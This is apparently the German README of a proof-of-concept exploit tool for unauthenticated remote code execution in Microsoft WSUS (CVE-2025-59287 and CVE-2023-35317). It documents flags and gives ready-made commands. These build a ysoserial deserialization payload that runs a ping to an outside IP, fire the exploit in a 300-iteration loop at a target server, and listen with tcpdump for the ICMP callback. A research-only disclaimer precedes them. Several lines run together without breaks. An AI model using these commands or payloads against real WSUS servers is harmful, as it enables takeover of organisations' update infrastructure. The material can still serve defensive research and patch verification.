
Unauthentifizierte RCE-PoC im Microsoft Windows Server Update Service (WSUS) - CVE-2025-59287 & CVE-2023-35317
In CVE-2025-59287: SoapFormatter RCE in WSUS: https://shellcode.blog/wsus-cve-2025-59287-investigation/
Diese Software wurde ausschließlich zu Zwecken der akademischen Forschung und zur Entwicklung effektiver Abwehrtechniken erstellt und ist nicht dazu bestimmt, Systeme anzugreifen, außer wo dies ausdrücklich genehmigt wurde. Die Projektbetreuer sind nicht verantwortlich oder haftbar für Missbrauch der Software. Verwenden Sie sie verantwortungsbewusst.
Erforderliche Flags:
--target-url – Basis-URL des Ziel-WSUS-Servers, z. B. http://WIN-246JC0TE3BB.vuln.local:8530--cve – Einer von CVE-2023-35317 oder CVE-2025-59287Optionale Flags:
--dns-name – Client-DNS-Name, der in SOAP-Anfragen verwendet wird (Standard: )bugcrowd.local--random – Stelle --dns-name ein zufälliges Subdomain voran, sodass jeder Lauf als neuer Client erscheint--payload – Benutzerdefiniertes base64-kodiertes ysoserial-Payload; falls weggelassen, wird ein eingebautes Payload für das gewählte --cve verwendet--debug – Aktiviere ausführliches Debug-Logging ([DEBUG]-Zeilen)python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --payload BASE64_YSOSERIAL_BLOB --dns-name bugcrowd.local --cve CVE-2025-59287 --randompython3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --dns-name bugcrowd.local --cve CVE-2023-35317 --random./ysoserial.exe -g RolePrincipal -f BinaryFormatter -c 'ping 18.118.100.100' -o base64 (oder verlassen Sie sich auf das eingebaute Payload für --cve CVE-2023-35317)for i in `seq 1 300`; do sleep 1; python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --payload BASE64_YSOSERIAL_BLOB --dns-name bugcrowd.local --cve CVE-2023-35317 --random ;donesudo tcpdump -l -n -i any icmp | while read line; do echo "$line"; echo -ne '\a'; done